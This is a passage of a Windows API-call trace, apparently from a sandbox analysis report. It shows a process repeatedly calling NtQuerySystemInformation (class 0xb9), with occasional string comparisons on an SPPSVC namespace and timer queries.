NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0287.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x38, ResultLength=0x0) [0287.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x20, ResultLength=0x0) [0287.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x20, ResultLength=0x0) [0287.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x20, ResultLength=0x0) [0287.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0287.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0287.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0287.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0287.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0287.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0287.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x28, ResultLength=0x0) [0287.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0287.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0287.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0287.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0287.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x20, ResultLength=0x0) [0287.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0287.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0287.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0287.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0287.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x20, ResultLength=0x0) [0287.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0287.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0287.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.373] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc8, Length=0x50, ResultLength=0x0) [0287.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x38, ResultLength=0x0) [0287.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0287.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0287.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0287.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0287.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x38, ResultLength=0x0) [0287.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0287.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0287.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x38, ResultLength=0x0) [0287.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0287.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0287.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0287.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0287.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x38, ResultLength=0x0) [0287.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0287.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0287.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0287.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0d8, Length=0x50, ResultLength=0x0) [0287.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d050, Length=0x28, ResultLength=0x0) [0287.388] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0d8, Length=0x50, ResultLength=0x0) [0287.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0d8, Length=0x50, ResultLength=0x0) [0287.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0287.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.388] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0287.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0287.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0287.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x38, ResultLength=0x0) [0287.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0287.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0287.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0287.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x28, ResultLength=0x0) [0287.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x38, ResultLength=0x0) [0287.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce10, Length=0x28, ResultLength=0x0) [0287.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce10, Length=0x28, ResultLength=0x0) [0287.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x38, ResultLength=0x0) [0287.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x20, ResultLength=0x0) [0287.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x20, ResultLength=0x0) [0287.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x20, ResultLength=0x0) [0287.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x20, ResultLength=0x0) [0287.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x38, ResultLength=0x0) [0287.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x20, ResultLength=0x0) [0287.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0287.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0287.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.408] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa78207d020 | out: lpSystemTimeAsFileTime=0xa78207d020*(dwLowDateTime=0x38a6711f, dwHighDateTime=0x1d6666a)) [0287.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0d8, Length=0x50, ResultLength=0x0) [0287.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d010, Length=0x28, ResultLength=0x0) [0287.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf28, Length=0x50, ResultLength=0x0) [0287.408] GetTickCount () returned 0x1187e36 [0287.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf8, Length=0x58, ResultLength=0x0) [0287.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0287.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0287.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0287.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0287.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0287.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x28, ResultLength=0x0) [0287.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0287.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0287.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0287.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0287.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x20, ResultLength=0x0) [0287.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0287.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0287.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0287.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 